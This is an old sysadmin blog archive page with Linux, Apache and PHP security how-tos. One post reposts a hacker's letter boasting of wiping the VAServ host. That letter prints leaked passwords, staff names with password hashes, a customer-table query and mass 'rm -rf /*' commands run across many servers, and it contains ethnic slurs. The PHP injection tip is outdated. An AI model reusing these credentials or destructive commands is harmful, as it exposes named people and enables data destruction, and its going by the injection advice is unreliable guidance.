Admins eHow

March 18, 2010

Prevent MySQL Injection in PHP

Filed under: General,MySQL,PHP,Security — Tags: , , , , — admin @ 5:21 pm

As it is explained everywhere on the web , the general solution to prevent mysql injection attacks in php is to use mysql_real_escape_string function , there are many guides on how to use it in conjunction with sprintf to escape dangerous characters before executing a mysql query, but I found a very innovative solution in a comment on php.net website , it recommends to escape all variables sent by user by get or post method in the beginning of every page which executes mysql queries :
first make sure magic_quotes_gpc is turned off on your php configuration , it can be checked on php info page.
this step makes sure your variables are not escaped twice.
This article explains how to disable magic quotes : Disabling Magic Quotes Guide
put the following code in the beginning of every page executing mysql queries :

	include ('mysql_connect.php');

	//This stops SQL Injection in POST vars
	foreach ($_POST as $key => $value) {
		$_POST[$key] = mysql_real_escape_string($value);
	}

	//This stops SQL Injection in GET vars
	foreach ($_GET as $key => $value) {
		$_GET[$key] = mysql_real_escape_string($value);
	}

mysql_real_escape_string needs you to be connected to your mysql database when you call it , so I have placed include (‘mysql_connect.php’); in the beginning of script , you can replace it with your own mysql connect commands.

March 3, 2010

How to authenticate Apache 2 with Radius on Debian

Filed under: Apache,Debian,Security — Tags: , , , — admin @ 11:37 am

Install Apache radius module :

apt-get install libapache2-mod-auth-radius

enable radius module for Apache :

a2enmod auth_radius

open /etc/apache2/apache2.conf and add the following lines to end of file :

AddRadiusAuth IP_OF_RADIUS_SERVER:PORT SECRET 5
AddRadiusCookieValid 60

go to /var/www folder or the folder which you want to protect and create a .htaccess file inside it containing following lines :

AuthType Basic
AuthName "AdminseHow Radius Authentication"
AuthBasicAuthoritative Off
AuthBasicProvider radius
AuthRadiusAuthoritative on
AuthRadiusActive On
Require valid-user

restart Apache :

/etc/init.d/apache2 restart

for more info regarding the configuration options , you can read the following link :
http://freeradius.org/mod_auth_radius/

August 27, 2009

How to clear all iptables rules

Filed under: CentOS,Debian,General,Security — Tags: , , , — admin @ 2:08 pm

In order to flush all iptables rules , Run the following commands :

iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

How to change windows 2003 administrator password from RDP.

Filed under: General,Security,Windows — Tags: , , — admin @ 6:48 am

In order to connect to a windows VPS remotely , you need to use a software named “Remote Desktop Connection” which is bundled with all versions of windows.
under windows XP it is located under : All Programs –> Accessories –> Communications
under windows Vista it is located under : All Programs –> Accessories
after running this software you will see the following window , enter the IP or host name of your VPS into the computer filed and click on Connect.

after a few seconds a new windows will be opened and you will be asked for the username and password , enter the username and password which is provided by your windows VPS provider. usually the username is Administrator.
if you enter the login details successfully , the desktop of windows VPS will be shown to you.

After you are logged into VPS , follow the below instructions :

Press CTRL+ALT+END buttons simultaneously , the following menu will appear :

Click on Change Password :

Fill the fields and click on OK.

Done :)

July 14, 2009

Limit Connections per IP using mod_limitipconn on cPanel

Filed under: Apache,CentOS,cPanel,General,Security — Tags: , , , , , , — admin @ 9:41 am

one of the problems I had on one of my cPanel servers was that some people were using download managers to download files from server , so hundreds of connections were being ESTABLISHED to Apache and it was becoming like a dos attack and causing Apache to become non responsive.
so here is what I did to limit connections per IP in a cPanel hosting server :
there is an Apache module named mod_limitipconn which will take care of it for us.
first download the latest version of mod_limitipconn from this site : http://dominia.org/djao/limitipconn2.html
decompress and install it.
at current time the latest version is 0.23.

wget http://dominia.org/djao/limit/mod_limitipconn-0.23.tar.bz2
tar jxvf mod_limitipconn-0.23.tar.bz2
cd mod_limitipconn-0.23
/usr/local/apache/bin/apxs -cia mod_limitipconn.c

next step is to add the required configuration to the Apache config file , we can add this directly to the end of httpd.conf file but the problem is that if we do this , the httpd.conf will be overwritten by easyapache so we will use include files to add our config.
login into your WHM panel , and follow the following menu items :
Main >> Service Configuration >> Apache Configuration >> Include Editor
on the Post VirtualHost Include section , choose All Versions from drop down menu and add the following config into it :

<IfModule mod_limitipconn.c>
<Location />
MaxConnPerIP 10
NoIPLimit images/*
</Location>
</IfModule>

then click on update and restart Apache server.
now We are all set :)

July 12, 2009

Backup Your Data in Linux by sending them to your GMail

Filed under: CentOS,Debian,General,Security — Tags: , , , — admin @ 8:33 am

A very effective way for backing up your data on a Linux server is to set a cron job on your box to mail your data to your GMail account. GMail servers are very reliable and give you a huge amount of space for free. so they are pretty suitable for backing up sensitive data.
In order to accomplish this , first create a directory named “backup” in the root directory of your box :

cd / && mkdir backup

then you need to create a script to do the backup and mail it for you.

nano /usr/bin/backup

copy and paste the following into the file :

cd /backup
rm -rf /backup/*
cp LIST_OF_FILES .
tar jcf backup.tar.bz2 *
echo | mutt -a backup.tar.bz2 -s "my daily backup" -- adminsehow@gmail.com

you have to change LIST_OF_FILES string to the list of the files you want to be backed up separated by space , and change adminsehow@gmail.com to your own gmail account.
as you can see in the script we are compressing the data files to make them as small as possible.
also we are using “mutt” to send emails so you need to install it , in Debian you can install it by following command :

apt-get install mutt

make the script executable :

chmod +x /usr/bin/backup

lastly you need to set a cron job , so open the cron file by following command :

crontab -e

and copy and paste the following command into it :

0 0 * * * /usr/bin/backup

it will run your backup script once daily :)
also don’t forget you need to have a working smtp server on your Linux box.

June 11, 2009

The letter of the hacker who wipped out almost the whole vaserv !

Filed under: General,Security — Tags: , , , — admin @ 5:31 am

Z3r0 day in hypervm?? plz u give us too much credit. If you really really wanna know how you got wtfpwned bitch it was ur own stupidity and excessive passwd reuse. Rus’s passwds are
Code:

e2x2%sin0ei unf1shf4rt 3^%3df 1/2=%mod5 f0ster

f0ster being the latest one, quite secure eh bitches? We were in ur networks sniffing ur passwds for the past two months quite funny this openvz crap is we could just get into any VPS we like at any time thanks to ur mad passwds. But we got bored so we decided to initiate operation rmfication and hypervm was a great t00l to do that since it spared us the time of sshing into all ur 200 boxen just to issue rm -rf. Coded a little .pl to do just that, take a look at this eleet output it’s mad dawg
Code:

[root@vz-vaserv .ssh]# perl h.pl -user admin -pass ****off -host cp.vaserv.com -cmd ‘rm -rf /* 2> /dev/null > /dev/null &’

  • Attempting to login using admin / ****off
  • Logged in, showtime!

Output for 67.222.156.106
Output for xen3ws.vaserv.com
Output for vz22uk.vaserv.com
Output for xen4ws.vaserv.com
Output for vzspecial5.vaserv.com
Output for xen16.vaserv.com
Output for vz77uk.vaserv.com
Output for 91.186.26.128
Output for xen25.vaserv.com
Output for vz76uk.vaserv.com
Output for vz18tx.vaserv.com
Output for vz75uk.vaserv.com
Output for vz45uk.vaserv.com
Output for vzpent16.vaserv.com
Output for xen1tx.vaserv.com
Output for vz13tx.vaserv.com
Output for vz74uk.vaserv.com
Output for vzspecial8.vaserv.com
Output for xen24.vaserv.com
Output for vz73uk.vaserv.com
Output for rdns1.vaserv.com
Output for vz2tx.vaserv.com
Output for vz17tx.vaserv.com
Output for xen23.vaserv.com
Output for vz72uk.vaserv.com
Output for xen22.vaserv.com
Output for vzruffbuff.vaserv.com
Output for vzmario.vaserv.com
Output for xen21.vaserv.com
Output for vz71uk.vaserv.com
Output for vzspecial7.vaserv.com
Output for vz70uk.vaserv.com
Output for xen20.vaserv.com
Output for vz69uk.vaserv.com
Output for vzspecial6.vaserv.com
Output for vz7uk.vaserv.com
Output for vzspecial4.vaserv.com
Output for vzspecial3.vaserv.com
Output for xen19.vaserv.com
Output for vzspecial2.vaserv.com
Output for vzspecial1.vaserv.com
Output for vzpent3.vaserv.com
output truncated due to massive boxen outputz
[root@vz-vaserv .ssh]# rm -rf /* > /dev/null 2> /dev/null &
[1] 12399
[root@vz-vaserv .ssh]#

Did the same fo ****vps.com after resetting the passwd to hyper ve emz, it was ever so much fun you should try it sometime Rus it’s GREAT!
BTW to all the customers we deleted ur loving provider is overselling their crappy 8gb nodez to hell and back, thought you’d like to know, you can also thank ur loving buddy Rus for losing ur data hihi. BTW Rus we still have ur billing system wtfpwned and baqdoored we got shitload of CCz from ur retarded customers thanks a lot buddy. Telling you this cuz we got bored of this ****, it’s just too easy and monotonous so patch ur crap, if your too dumb to secure a simple web server my rate is $100/hour or one night with ur sister hauhaiahiaha.
Also wheres ur team Rus? the only ****ers i saw in ur billing sys are Kody, Vlada and u you guys work like ****ing hindus i bet but ur cheap like jews lolz hire some pros like me to help you out manage all those retards VPSs lolololl
Code:

1 1 rghf c32f3310baffcb431875a67196e99ebd Rus F zswlxxoomx@nowmymail.com 0 ,
Edit Delete 3 1 vlada c32f3310baffcb431875a67196e99ebd Vlada Neskovic zswlxxoomx@nowmymail.com 0 ,
Edit Delete 4 1 Kody fde67637d867c52d739931528dd92ef0 Kody Riker zswlxxoomx@nowmymail.com Georgia – server22 space 1slot 1gb 0 ,

See we care about ur privacy and edited ur emailz unlike you who do not care about the privacy of ur retarded customers lol
Code:

Showing rows 0 – 29 (1,361 total, Query took 0.0133 sec)
SELECT *
FROM `tblclients`
LIMIT 0 , 30

Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus.

Yea yea “his IP is:64.79.210.78″ here i saved u the trouble lolol
Code:

-bash-3.2# ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:16271 errors:0 dropped:0 overruns:0 frame:0
TX packets:16271 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1114930 (1.0 MiB) TX bytes:1114930 (1.0 MiB)

venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:127.0.0.1 P-t-P:127.0.0.1 Bcast:0.0.0.0 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
RX packets:33396 errors:0 dropped:0 overruns:0 frame:0
TX packets:34122 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4462516 (4.2 MiB) TX bytes:11170841 (10.6 MiB)

venet0:0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:64.79.210.78 P-t-P:64.79.210.78 Bcast:64.79.210.78 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1

venet0:1 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:64.79.206.197 P-t-P:64.79.206.197 Bcast:64.79.206.197 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1

venet0:2 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:67.223.225.52 P-t-P:67.223.225.52 Bcast:67.223.225.52 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1

-bash-3.2# rm -rf /* 2> /dev/null > /dev/null * &
[1] 7643
-bash-3.2#

I love to rm lol bye

~Thedefaced.org

May 16, 2009

Guide to secure the server using DenyHosts

Filed under: CentOS,Debian,General,Security — Tags: , , , , — admin @ 9:20 am

One of the greatest tools I have found to secure the server from brute force attacks and keep your server out of the reach of hackers is DenyHosts.
What DenyHosts does is very simple , but very effective , it processes auth.log ( in Debian based distros ) or secure.log ( in Redhat based distros ) and finds unsuccessful login attempts through ssh and blocks the attacker through /etc/hosts.deny file.
also it has a central server which can synchronize all DenyHosts instances around the world , so if there is an attacker detected in US , it will be blocked in all of the world very fast ! but this option needs to be enabled in config file.
DenyHosts is an open source project and is available to download at sourceforge : http://denyhosts.sourceforge.net

As my favorite distro is Debian , I guide you how to install and use it on Debian. but steps are almost the same on CentOs.
DenyHosts is available through Debian repos so you can simply install it by :

apt-get install denyhosts

then you need to configure it , configuration file is located at /etc/denyhosts.conf
I suggest you to read the whole file and understand it , it worth’s the time. but in case you need a good working configuration, you can use mine :

SECURE_LOG = /var/log/auth.log
HOSTS_DENY = /etc/hosts.deny
PURGE_DENY = 1w
PURGE_THRESHOLD = 2
BLOCK_SERVICE  = sshd
DENY_THRESHOLD_INVALID = 5
DENY_THRESHOLD_VALID = 10
DENY_THRESHOLD_ROOT = 1
DENY_THRESHOLD_RESTRICTED = 1
WORK_DIR = /var/lib/denyhosts
SUSPICIOUS_LOGIN_REPORT_ALLOWED_HOSTS=YES
HOSTNAME_LOOKUP=YES
LOCK_FILE = /var/run/denyhosts.pid
ADMIN_EMAIL = youremail@domain.com
SMTP_HOST = localhost
SMTP_PORT = 25
SMTP_FROM = DenyHosts <nobody@domain.com>
SMTP_SUBJECT = DenyHosts Report
AGE_RESET_VALID=5d
AGE_RESET_ROOT=25d
AGE_RESET_RESTRICTED=25d
AGE_RESET_INVALID=10d
DAEMON_LOG = /var/log/denyhosts
DAEMON_SLEEP = 30s
DAEMON_PURGE = 1h
SYNC_SERVER = http://xmlrpc.denyhosts.net:9911
SYNC_INTERVAL = 1h
SYNC_UPLOAD = yes
SYNC_DOWNLOAD = yes
SYNC_DOWNLOAD_THRESHOLD = 3
SYNC_DOWNLOAD_RESILIENCY = 5h

Don’t Forget to set ADMIN_EMAIL and SMTP_FROM to your own emails.
One of the important steps that you should do is to add your own IP address to white list so it doesn’t get blocked.
to do this , open /var/lib/denyhosts/allowed-hosts file and enter your own IP in it.
if you have forgotten to do this and now you are blocked from server , you need to connect to server from another IP address and do the following steps :

1.Stop DenyHosts :

/etc/init.d/denyhosts stop

2.Remove the IP address from /etc/hosts.deny
3.Also you need to remove your IP address from any file located in /var/lib/denyhosts , first look which files contain your IP :

grep Your_IP *

The remove the IP from files using your favorite editor or method ;)

Edit : I have found a great solution to delete your IP from all files all at once.

sed -i '/Your IP/d' *

4.Consider adding the IP address to /var/lib/allowed-hosts
5.Start DenyHosts

May 13, 2009

How to block access to a file using .htaccess

Filed under: General,Security — Tags: , , , — admin @ 1:33 pm

If you have a file in your web directory which you want to keep secure , you can block the access to it by following lines in your .htaccess file:

<Files FILENAME>
deny from all
</Files>

May 12, 2009

Secure Your WebServer by Disabling Dangerous PHP Functions

Filed under: CentOS,cPanel,Debian,General,Security — Tags: , , , — admin @ 8:02 pm

In order to secure your web server you need to disable some php functions which may be used to hack your server.
open your php.ini file and search for “disable_functions” then replace it with following directive :

disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"

after this step you need to restart apache server.
if you have cPanel installed on your server , you need to run the following command from SSH for cPanel work properly :

/scripts/makecpphp

it will make another instance of PHP for internal cPanel/WHM use.

« Newer Posts

Powered by WordPress